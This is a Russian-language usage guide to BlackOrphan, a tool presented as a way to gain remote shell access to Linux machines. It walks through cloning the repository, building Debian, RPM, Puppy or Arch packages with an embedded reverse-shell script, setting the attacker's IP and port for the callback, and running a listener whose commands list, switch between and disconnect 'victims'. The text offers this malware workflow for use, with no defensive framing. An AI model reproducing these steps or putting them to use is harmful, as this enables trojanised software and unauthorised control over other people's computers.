BlackOrphan – это инструмент, созданный с помощью Bash / nodeJs, в основном для получения удаленного доступа к оболочке Linux Box
Использование
клонируем репозиторий:
# git clone https://github.com/zombieleet/BlackOrphan.git
запускаем blackorphan из командной строки:
# ./BlackOrphan1.0 ============================== 1. Create a server 2. Start a Listerner 3. About q. Exit ==============================
выбор пункта 1 позволяет создать пакет с обратным сценарием прослушивания шелла, встроенным в пакет
Select the target Operating System =================================== 1. Debian base linux system 2. Rpm base Linux system 3. Puppy Linux (.pet) 4. Arch Linux r. Run b. Go back to previous menu q. Exit ==============================
Выбирая любой из параметров, кроме b, r и q, вы можете выбрать тип пакета, который хотите создать.
Желательно создать пакет (возможно, пакет deb) и использовать alient для его преобразования для поддержки других платформ.
# BlackOrphan:create_server:debian_base>
При этом вы должны установить ip и порт атакующего с помощью этой команды.
Эта команда будет использоваться для обратного соединения.
# set lhost_lport ip_address port BlackOrphan:create_server
Create a new debian package for the Malware?[y|n]:
Specify script to bind with:
Запустите listener.js с номером порта для подключения
# ./listener.js 4444
- killclient
- list
- switch
killclient
killclient временно останавливает ваш доступ к жертве, он принимает идентификатор – id , который является просто числом
например
killclient 1 >> убивает клиента с идентификатором 1
list
перечисление всех пострадавших в данный момент жертв
switch
он переключает или изменяет объект сокета, указывая на другую жертву.
Требуется один параметр, который является идентификатором жертвы
например
switch 3 >> изменяется клиента с идентификатором 3
Регулярные обновления будут добавляться в BlackOrphan каждые 2 недели